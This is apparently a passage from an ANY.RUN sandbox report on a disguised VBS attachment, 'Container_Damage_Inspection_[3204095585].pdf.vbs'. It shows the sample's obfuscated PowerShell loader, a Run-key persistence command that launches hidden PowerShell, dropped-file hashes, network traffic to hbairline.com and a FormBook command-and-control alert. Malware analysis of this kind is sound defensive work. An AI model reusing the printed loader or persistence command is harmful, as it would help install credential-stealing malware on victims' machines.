nsUprigh=Uvilli$DatoliSSpectatDameskr ImmeneSolb dgTienkomUnque aTornfuaLoueyclTvundne AutomnImplore Veldts') ;Parenteral $Amfibietanke;Parenteral (Miljsttteordnings '.onvoj[Uns.gnT Hypheh PinacRpyrosteW,iteia HyperDE.periiPlutocNInchoag Aarig. KosmoTUnsympHP.osphrMistraeBlokt A.entagDCachep] Jette:in erc:Du klisKaraktL iagnoeIndisseRegeripBrser.(Jovite4prece 0Kur.ka0 Asket0pungen)');Parenteral (Miljsttteordnings 'Antape$Gy nasGroduddlBagstaoTrof rBE ikkeATa perLAf ift:PraeseuLax,tif ti.byo RevoiRFededek otanuNcopartyBlastoTKommanTElectrE Tr mb= esvig(Rep odt .askaeMidtersAfh esTFrak.n-SnderrP ruffiaJordlot Alkylhbeboel Minimu$Brad ps BogkawAbsorbaUnder.mrequespWi nersSkand,ityndslDAbandoe Backh)') ;Parenteral (Miljsttteordnings 'Looner$ NonfogUnextrL raakaoOesttrB HarpiaOrdinalArraig:ThalasAAzo,ubnHlsp rtRullerEDefectR S,bcao glaneMSkri,ee enracd Nonliiafsen.AkartognPunkt =Tidier$daydreG UnderLW thdroCopartBDemonoADatoliLWhanki: yraaKRokkesoPattamLAntiabiTolpk S ophth+Prebi +So the%Tirens$ bestim Sandao nusspDOperatUCupuliLForgudaEg istRZoisit.VariancMoulteOstvfnuuByboennRund pT') ;$Makrotabels=$Modular[$Anteromedian]}$Skenens=407275;$Panamansk=32979;Parenteral (Miljsttteordnings ' overs$ opla g TrafiLhelsi.oKnopl BPlebisaElastoLArbejd: RealtBBeloebIBallepsAntispaInddknmRu derPSubcale KapslLPapegjstha,lnET gole unc ff=Overpl buddinGGeninde Ga ant Bran,-Galv nC vangO Sulp NBeadrotPharmae spiseNNationtL thos C.lind$ UddatsUngentwPendafAKo,junMAffranP GasseSMborifI revpdfodstyE');Parenteral (Miljsttteordnings 'Bund n$Husmang ArboulBu heloStrstebUnruffaSkotunl Irror:AutophEDem phn F ggevTe poriDiplomoManessuCustodsAfvejel.trkneyRecit Omsvr =D arma Nonin[IntercSDacapoyBurressClimattimmedieCalorim Unjus.NonexcCSpionsoFicoidn K aphvUpoliteLavederTot edtSandpa] D rri: Cri i:EpigloFEpither TowneoBilledm RagouB skolea PatolspilleseFlintr6Unenta4KoraleS Fra,ktNvn rnr fspeji Harmon Ac.obg.ettic(Holloa$ProjekB uantiiTrio,psIntoleahndvammNondispCresole UninhlSidelnsluf treConpla)');Parenteral (Miljsttteordnings ' Kompa$Prisp.GReignilHoneymoForblfbUnder,A I.drelShiitt:UkrnkeVPhotinARiffleL Skrivu FetistTyknesaOctahyM UnderaKommenRR psetkDataseeSoarinDBusb r ponso=Aimerp Ottere[FrihavSDra aty HystasOnychotHarnesePaakliMEvighe.sackamtKaimane Antifx BilleTMakule. SuperE oreplnUdbasuCPour boRomanidFlaadeiTidsfoN u frsgAxbrev]M zdaf: Delez:I.surmaerkendS FormeCPasserIKildemi Tesse. LempeGLandvseOpsl.gt SuperSo.ienttAnslagrLaid yiMeconin ElveaG Uborg(Du ont$outsetE HypopNBallelv,iskriIKapitaoKarterUUnsinfsHorsecLHermafYForest)');Parenteral (Miljsttteordnings 'Sljfni$E coriGhenhusLM,stico Ln,kabSurrinASkiveblLe tom: VejtruLustraD KontolRabelaANecropnPanp edTykhudsLrerego erogrP Retu H efrugoOrtho,LSystemDspeake=C,bica$stereoVGesjftaVrdierLfodrhoU BestetCleidoAOpklarM ForfgAplanetrPudsenkAzoxyuEAnhidrDViger,. AfsavSmrt lvuDsch bB F rvrSUn eveTUnpictRBegre,I Z nganHaanenG Pan.r(Hie ar$ HalffsUnder kAntebre MetabNInd stEKeratoNCik,ris Taelh,N nedi$ T llipHvdingaInflekNCytozyA AfsigmS ockcaisocryNArmoursOvervrkIndi e)');Parenteral $Udlandsophold;
(PID) Process:(4428) msiexec.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:Moderliges
Value:
c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(PID) Process:(4920) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Skilberens130
Value:
%Moderliges% -windowstyle 2 $Vaws=(g`p 'HKCU:\Software\Vermiformous195\').'Megilp';%Moderliges% ($Vaws)
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\5\ApplicationViewManagement\W32:00000000000C0162
Operation:writeName:VirtualDesktop
Value:
1000000030304456BFA0DB55E4278845B426357D5B5F97B3
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
Operation:writeName:TraySearchBoxVisible
Value:
1
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
Operation:writeName:TraySearchBoxVisibleOnAnyMonitor
Value:
1
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\5\ApplicationViewManagement\W32:00000000000C0162
Operation:delete keyName:(default)
Value:
Executable files
0
Suspicious files
5
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
8076powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lyedfxa2.pws.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8076powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:8958C2928559DBD57E811291C5382869
SHA256:CBE224B37203D02EFDD8F0F4625C8174E873B2F00A936D5763790932A5337640
7248powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k2kkpowj.2lx.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8076powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1m05lr4q.4fj.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7248powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kdsfdhcp.yxg.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8076powershell.exeC:\Users\admin\AppData\Roaming\Undermaalers.Tubtext
MD5:54F7A0829F9BDC685AD2A71D3E467336
SHA256:346367F354988C2D341B7363BAE46ADA704D46104D465A849AB52E5C57D5B5E6
7248powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
7928powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oyl5mp5q.24x.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4428msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751binary
MD5:E192462F281446B5D1500D474FBACC4B
SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60
5492explorer.exeC:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datbinary
MD5:E49C56350AEDF784BFE00E444B879672
SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
26
DNS requests
18
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5728
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5728
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4428
msiexec.exe
GET
200
69.192.161.44:80
http://x1.c.lencr.org/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
40.126.31.128:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
8076
powershell.exe
115.167.74.18:443
hbairline.com
WITRIBE PAKISTAN LIMITED
PK
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.20
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
google.com
  • 142.250.181.238
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 40.126.31.128
  • 20.190.159.4
  • 40.126.31.131
  • 20.190.159.68
  • 40.126.31.73
  • 40.126.31.0
  • 40.126.31.130
  • 40.126.31.71
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
hbairline.com
  • 115.167.74.18
unknown
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted

Threats

PID
Process
Class
Message
Malware Command and Control Activity Detected
ET MALWARE FormBook CnC Checkin (GET) M5
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Container_Damage_Inspection_[3204095585].pdf.vbs